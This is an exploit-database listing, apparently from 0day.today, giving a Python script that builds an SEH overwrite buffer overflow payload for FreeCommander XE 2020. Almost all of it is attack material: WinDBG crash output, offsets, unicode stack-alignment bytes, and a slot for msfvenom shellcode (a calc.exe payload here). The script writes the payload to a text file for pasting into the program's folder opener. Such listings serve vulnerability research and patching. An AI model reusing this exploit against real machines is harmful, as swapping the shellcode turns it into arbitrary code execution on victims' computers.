0day.today - Biggest Exploit Database in the World.
FreeCommander XE 2020 Pathname Buffer Overflow Exploit
#!/usr/bin/python
# Exploit Title: FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version: Build 810a 32-bit
# Software Link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win8.1 x64 - Build 9600
#
# Description:
# - Exploits the command / folder opener in the main window by entering an overly long string and pressing enter:
#   a crash will occur and the Structured Exception Handler kicks in (SEH overwritten).
# - Some stack alignment was required, which eventually led to the ability to run shellcode.
#
# Reproduction:
# - Use the indicated OS or manipulate settings for stack alignment: your mileage may vary due to different
#   offsets on other Windows versions / SPs.
# - Run the script; a TXT file will be generated.
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output into the command / folder
#   opener of FreeCommander.
# - Check results.
#
# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe -
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c add byte ptr [eax+eax+5Ch],ah ds:002b:0000005c=??
import sys, struct

# Filename
filename = "win8_freecommander_poc.txt"

# Maximum length
maxlen = 2000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = (
    "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"
)

# Offsets
seh = 522
nseh = seh - 2

# Venetian NOP
nop = "\x45"

# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = (
    "\x54"            # PUSH ESP
    + nop +           # Padding
    "\x58"            # POP EAX
    + nop +           # Padding
    "\x05\x11\x11"    # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
    + nop +           # Padding                                                  |--> Adds 0x0f00 bytes
    "\x2d\x02\x11"    # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
    + nop +           # Padding
    "\x40"            # INC EAX # Added due to one-off unicode byte
    + nop +           # Padding
    "\x50"            # PUSH EAX
    + nop +           # Padding
    "\xc3"            # RET
)

# Prefix
prefix = "A" * seh    # Fill junk

# NSEH/SEH
nseh = "\x41\x45"     # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c"      # POP POP RET

# Suffix
suffix = nop * 3                                               # Align
suffix += align_esp                                            # Align registers; EAX for executing shellcode
suffix += nop * 48                                             # Nopping until buffer
suffix += shellcode                                            # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))   # Fill junk

# Concatenate string for payload
payload = prefix + nseh + seh + suffix

# Put it all together
try:
    file = open(filename, "wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)

# 0day.today [2024-11-15] #